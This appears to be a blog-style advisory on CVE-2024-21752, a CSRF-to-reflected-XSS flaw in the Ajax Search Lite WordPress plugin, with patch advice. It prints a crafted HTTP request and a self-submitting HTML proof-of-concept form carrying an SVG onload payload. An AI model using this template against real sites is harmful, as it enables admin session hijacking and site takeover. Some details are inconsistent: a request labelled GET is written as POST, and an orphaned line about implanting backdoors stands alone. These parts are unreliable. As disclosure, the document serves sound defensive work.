In early 2024, security researchers uncovered a dangerous vulnerability (CVE-2024-21752) affecting Ajax Search Lite, a popular WordPress plugin by Ernest Marcinko. If you're running a website that uses this plugin, it's vital you understand what's at stake—even if you’re not a technical expert. This vulnerability is a combination of Cross-Site Request Forgery (CSRF) and Reflected Cross-Site Scripting (XSS) that attackers can exploit to run malicious code on your website.
Let’s break down what happened, how attackers can abuse this bug, and what you should do right now.
What is Ajax Search Lite?
Ajax Search Lite is a WordPress search plugin used on more than 60,000 websites worldwide. It provides fast, live search results that update as users type—improving the experience for visitors.
What is CVE-2024-21752?
This bug is a Cross-Site Request Forgery (CSRF) vulnerability that leads to Reflected Cross-Site Scripting (XSS). It was found and reported by security folks in early 2024 and given the ID CVE-2024-21752.
The problem affects all versions up until 4.11.4. If you haven't updated lately, you're probably at risk.
Breaking Down CSRF and XSS
- CSRF: If you’re logged into your WordPress site, attackers can trick your browser into doing things without your permission—just by visiting a malicious website or clicking a bad link.
- Reflected XSS: Attackers can trick your site into sending a script (malicious JavaScript code) back to your browser, which then runs with your permissions. If you’re an administrator, attackers could take complete control of your website.
When combined, these issues can allow an attacker to steal your cookies, hijack your account, take over your site, or deface your web pages.
Basic Flow
1. The attacker tricks the logged-in admin into clicking a malicious link or visiting a page (this is the CSRF part).
2. The attacker sends script code (e.g., <script>alert(1)</script>) to the vulnerable Ajax Search Lite endpoint.
Vulnerable Endpoint
The attack targets parameters in the plugin’s admin area that are not properly sanitized. Here’s what an attack GET request might look like:
POST /wp-admin/admin-ajax.php?action=ajax_searchlite_search HTTP/1.1
Host: victim-site.com
Content-Type: application/x-www-form-urlencoded
Cookie: [your logged-in session]
Content-Length: N
aslp_data=%22%3E%3Csvg/onload=alert(1)%3E
The plugin fails to filter dangerous input in the aslp_data parameter. As a result, whatever is sent in this parameter may be reflected directly into the page.
Proof of Concept (PoC) Exploit
Here’s a simple HTML file that launches the attack (save as exploit.html and send it to a logged-in admin):
<!DOCTYPE html>
<html>
<body>
<form action="https://victim-site.com/wp-admin/admin-ajax.php?action=ajax_searchlite_search"; method="POST" id="csrf_form">
<input type="hidden" name="aslp_data" value='"><svg onload=alert(1)>'>
</form>
<script>
document.getElementById('csrf_form').submit();
</script>
</body>
</html>
When the admin visits this page, the browser submits the form to the plugin endpoint, injecting a malicious payload that pops up an alert box. (Real attackers would do something far worse!)
Implant backdoors for further attacks
This all happens silently, in the background, without you ever knowing.
Patch and Mitigations
Ernest Marcinko released a patch in version 4.11.5. Upgrade right now if you’re not on at least this version.
- Plugin page & latest releases
- Official Changelog
There’s no practical mitigation short of updating. Disabling the plugin temporarily reduces risk.
References
- NVD Entry for CVE-2024-21752
- WPScan Vulnerability Database
- Plugin homepage
Conclusion
CVE-2024-21752 shows how even well-maintained plugins can have surprise bugs. If your site runs Ajax Search Lite, update to version 4.11.5 or newer immediately. Keep your plugins up to date and stay alert for vulnerability news.
Need help? If you’re not sure about your site’s status, talk to your developer or hosting company. Don’t wait for attackers to find you!
Timeline
Published on: 02/29/2024 06:15:47 UTC
Last modified on: 02/29/2024 13:49:29 UTC